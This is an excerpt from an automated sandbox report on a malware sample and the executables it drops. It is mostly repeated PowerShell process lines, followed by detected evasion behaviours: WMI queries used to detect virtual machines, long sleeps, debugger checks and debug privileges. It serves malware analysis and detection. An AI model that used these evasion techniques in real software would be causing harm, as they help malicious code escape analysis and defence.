Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Memory allocated: 12E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Memory allocated: 2BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Memory allocated: 4BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Memory allocated: BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Memory allocated: 1A6F0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Window / User API: threadDelayed 3751 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Window / User API: threadDelayed 5426 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Window / User API: threadDelayed 473 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Window / User API: threadDelayed 9360 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5069
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4757
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2006
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 7680 Thread sleep time: -28592453314249787s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6936 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6792 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep count: 7557 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep count: 2006 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep time: -3689348814741908s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00409396
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0040DD0E
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: wjoqZlIS.exe, 00000002.00000002.1813715305.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041E48E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041E48E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 0_2_004254C5
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
